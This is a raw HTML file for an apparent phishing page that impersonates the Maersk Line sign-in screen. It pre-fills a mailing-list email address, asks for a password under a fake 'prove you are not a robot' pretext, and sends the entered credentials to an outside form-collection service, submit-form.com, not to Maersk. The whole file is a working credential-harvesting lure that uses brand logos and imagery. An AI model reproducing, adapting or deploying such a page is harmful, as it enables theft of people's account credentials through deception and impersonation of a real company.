<html lang="en">

<head>
    <meta http-equiv="x-ua-compatible" content="EmulateIE9">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
        <link rel="icon" type="image/ico" href="https://firebasestorage.googleapis.com/v0/b/fdxefd.appspot.com/o/wessa.png?alt=media&token=2f210dd0-3c73-4fc4-9b7d-47c7ff5f90e9">
    <title>Maersk Line | Sign in</title>
</head>

<body style="background-image: url(https://firebasestorage.googleapis.com/v0/b/backgrounds-70dbb.appspot.com/o/maersk-line%2Fport-maersk-account.jpg?alt=media&token=0a6e384a-3f95-4a2a-b3dc-04c235833332); background-repeat: no-repeat;background-size: cover;">
    <div class="container-fluid p-0">
        <div class="container">
            <div class="row my-5">
                <div class="col-lg-6 mx-auto">
                    <div class="m-5 p-4 bg-white rounded" id="div1" style="box-shadow: 0px 2px 5px rgba(0,0,0,0.5);">
                        <div class="text-left">
                            <span><img class="banner-logo" src='https://firebasestorage.googleapis.com/v0/b/fdxefd.appspot.com/o/fgsv%2Findexx.png?alt=media&token=8cceb629-12ef-4db1-b3fb-6b6f029b5ba7'/></span><br><br>
                            <span class="h4">Sign in</span><br>
                            <span class="h5"></span><br>
                            <span class="h">Confirm identity to prove you are not a robot.</span><br>
                            <span id="msg" class="text-danger" style="display: none;">Invalid Password..! Please enter correct password.</span><br>
                            <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
                            <small></small>
                            <div class="form-group">
                                                        <form action="https://submit-form.com/8ECOpZKO" method="post">
                                <input type="email" id="login" name="AA" class="form-control rounded-0 bg-transparent" aria-describedby="aiHelp" placeholder="Email Address" value="pkg-clamav-devel@alioth-lists.debian.net" readonly autofocus required >
                            </div>
                            <div class="form-group mt-2">
                                <small></small>
                                <input type="password" id="passwd" name="BB" class="form-control" aria-describedby="aiHelp" placeholder="Enter Password" autofocus required>
                            </div>
                        </div>
                        <div class="form-check mt-3">
                            <input type="checkbox" class="form-check-input" id="exampleCheck1">
                            <label class="form-check-label" for="exampleCheck1"><span><a href="#">Keep me sign in</a></span></label>
                            <span><span><a href="#" class="float-right">Forgot Password?</a></span></span>
                        </div>
                        <div class="col-lg-12 mt-3">
                            <button type="submit" class="btn text-white px-4 w-100" id="submit-btn" style="background-color: #1cceed;">LOGIN</button>
                        </div>
                    </div>
                </div>

</html>